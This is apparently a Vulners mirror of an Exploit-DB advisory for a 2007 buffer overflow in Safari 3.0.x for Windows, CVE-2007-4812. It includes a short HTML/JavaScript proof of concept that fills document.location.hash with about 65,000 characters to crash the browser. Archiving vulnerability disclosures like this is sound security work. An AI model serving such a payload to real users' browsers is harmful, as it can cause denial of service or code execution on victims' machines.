Lucene search
+L

Apple Safari 3.0.x for Windows - 'Document.Location.Hash' Buffer Overflow

🗓️ 25 Jun 2007 00:00:00Reported by Azizov EType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 32 Views

Apple Safari 3.0.x for Windows Buffer Overflow via Document.Location.Has

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2007-4812
11 Sep 200718:00
cve
cvelist
Cvelist
CVE-2007-4812
11 Sep 200718:00
cvelist
euvd
EUVD
EUVD-2007-4793
7 Oct 202500:30
euvd
nvd
NVD
CVE-2007-4812
11 Sep 200718:17
nvd
prion
Prion
Buffer overflow
11 Sep 200718:17
prion
source: https://www.securityfocus.com/bid/26448/info

Safari for Windows is prone to a buffer overflow that occurs when an attacker entices a victim to view a maliciously crafted webpage.

A remote attacker may exploit this issue to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will result in denial-of-service conditions.

<html> <body> <script> var maxbuf = 65474; buff = "A"; for (i=0;i<maxbuf;i++) { buff = buff+"A"; } document.location.hash = buff+"BOW! "; alert(document.location.hash); </script> </body> </html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Jan 2014 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 25
EPSS0.0304
32